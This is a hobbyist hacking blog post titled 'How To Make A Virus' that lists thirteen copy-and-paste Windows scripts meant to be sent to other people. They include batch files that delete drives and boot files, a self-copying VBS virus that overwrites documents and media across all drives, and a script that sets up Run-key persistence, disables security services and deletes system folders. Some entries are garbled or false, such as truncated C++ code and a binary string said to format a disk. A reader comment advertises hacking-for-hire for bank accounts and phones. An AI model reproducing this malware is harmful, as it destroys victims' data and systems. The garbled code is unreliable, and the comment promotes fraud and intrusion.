Blogger Widgets How To Make A Virus | Hack It Cafe

Popular Hacks

Tuesday 23 October 2012

How To Make A Virus

1

I'm sure that everyone dreamed just once to make a virus and spread him.I personally dreamed to make a big virus and spread it I recognize.Today I've found that you don't need any advanced skills to make a virus.Anyone can make one with a few simple mouse clicks.All you have to do is below...







1) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

----------------------------------------------------------------------------------------------------------------------------------

2) A real virus

A real virus can copy itself. If you want a real virus that can infect other files then type this code and save as a .vbs
this is the code:
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
For Each d In fso.Drives
If d.DriveType + 2 And d.IsReady = True Then
Call SubFolders(d & "\")
End If
Next

Function infect(path)
On Error Resume Next
Set fold = fso.GetFolder(path)
For Each f In fold.Files
ext = fso.GetExtensionName(f.path)
If (ext="doc") or (ext="txt") or (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") or (ext="js") or (ext="mp2") or (ext="mp3") or (ext="vbs") or (ext="vbe") or (ext="jpeg") or (ext="jpg") Then
fso.CopyFile WScript.ScriptFullName, f.path & ".vbs", True
fso.DeleteFile f.Path, True
End if
Next
End Function

Function SubFolders(path)
On Error Resume next
For Each subf In fso.GetFolder(path).SubFolders
Call Infect(subf.Path)
Call SubFolders(subf.Path)
next
End function
save as .vbs
this virus overwrites files with these extentions:.doc,.txt,.js,.jse,.css,.wsh,.sct,.hta,.js,.mp2,.mp3 ,.vbs,.vbe,.jpeg,.jpg i am NOT responsible for any damage caused by this virus so PLEASE DO NOT RUN THIS SCRIPT UNLESS YOU WANT DATA LOSS

----------------------------------------------------------------------------------------------------------------------------------


3) A simple virus that will erase the C drive and even an antivirus will not come to know.


@Echo off
Del C:\ *.*|y

----------------------------------------------------------------------------------------------------------------------------------

4) A simple virus that will erase the all the  drives and even an antivirus will not come to know.

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

----------------------------------------------------------------------------------------------------------------------------------


5)  How to crash a PC Forever !:::


@echo off

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**

------------------------------------------------------------------------------------------------------------------------------------------------------------------

6) How to stop someone's internet access::::


@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

------------------------------------------------------------------------------------------------------------------------------------------------------------------

7 )ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

---------------------------------------------------------------------------------------------


8) Freeze someone's desktop:::




this is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now in the desktop, we have 2 remove desktop icons and shortcuts, so right click on the mouse and then properties, click on desktop then select customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now to remove the shortcuts in the desktop, go to start and select My Computer, then click on c: right click on ur mouse and select new folder, write it any name
6.now go to desktop & select all da icons and right click on them then press cut,go to c: and paste them in the folder dat u created then close the window.
7.now to put the fake desktop image and remove the taskbar, so right click on desktop and gp to properties, now go to desktop and select Browse, select the file that u saved then press appply then ok. now to remove the windows taskbar, right click on the taskbar and go 2 properties, then select autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!

------------------------------------------------------------------------------------------------------------------------------------------------------------------

9) SHUT UR INTERNET PERMENANTLY:::


This is a slightly more advanced one. It shuts down your internet permanately. I tried it on myself accidently, i knew what it did, and it still took me a couple of days to get my internet back. works best on XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt what disables the internet permanately. It is somethinge else, that just provides a fast response to shut down any connections.


@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a

------------------------------------------------------------------------------------------------------------------------------------------------------------------

10) MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::


Warning - Do not run it on your computer

I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-save it as matrix.bat
4-finish



AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT


IF U LIKE MY POST PLZ SAY THANKS TO ME

------------------------------------------------------------------------------------------------------------------------------------------------------------------

11) A simple virus to format your HDD


This is a simple virus that formats HDD. Write The Following In Notepad Exactly as it says 01001011000111110010010101010101010000011111100000
Save the file as .exe, any name will do.

------------------------------------------------------------------------------------------------------------------------------------------------------------------

12) Another harmfull one - Flood1 


* Copy this to notepad and save as flood1.bat.....


@ECHO OFF
@ECHO AN MS PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

wat does it do : this is an extremely harmful virus the will keep
replicating itself until your harddrive is totally full and will destroy
ur comp.

----------------------------------------------------------------------------------------------------------------------------------


13) Another one that will format all your hard drives.



@echo off

del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
save it as anything.bat

1 comments:

  • 9 September 2019 at 14:13

    GREAT NEWS, YOU'VE JUST FOUND A LEGIT HACKER,
    HAVE YOU LOST YOUR HARD EARNED FUNDS TO THE BINARY OPTION SCAM?
    Right now, millions of hackers, spammers and scammers are hard at work. They're after your Social Security number, bank account information and social media accounts. With any of these, they can steal your money or trick your friends into giving up theirs.
    Between semi-amateurs with automated systems and serious hackers who are masters of technology and trickery, how can you possibly hope to stay safe?

    The best way is to know how hackers do what they do. Once you know that, you can counter their malicious acts.
    Welcome to the ALEXGHACKLORD@GMAIL .com
    In the world of hacking we are the best when it comes to client satisfaction. Stop being scammed by fake hackers. Profound Hacks Tech is an experienced online Private Investigator/Ethical Hacker providing investigative solutions and related services to individuals. You might be curious that what hacking group services can provide? .. If you hire a hacker, you always have worried of losing your money. We won't keep a cent if we can't do your job. 100% refund if job is not completed. Contact - ALEXGHACKLORD@GMAIL. com We render
    +University Grades Hack,
    +Bank Account Hacks,
    +Control devices remotely hack,
    +Facebook Hacking Tricks,
    +Gmail, AOL, Yahoomail, inbox, mobile phone (call and text message Hacking are available)
    +Database Hacking,
    +PC Computer Tricks
    +Bank transfer, Western Union, Money Gram, Credit Card transfer
    +Wiping of Credit,
    +VPN Software,
    +ATM Hack
    email us now ::ALEXGHACKLORD@GMAIL. COM
    +Are you suspecting your partner of cheating or having an extramarital affair?
    As that could result in unnecessary confusion in your relationship or marriage. it's always advisable to consult a professional hacker to help you get concrete evidence by discreetly getting access to their phone or computers.
    ALEXGHACKLORD can also work on that.

    NOTE


Post a Comment

Related Posts Plugin for WordPress, Blogger...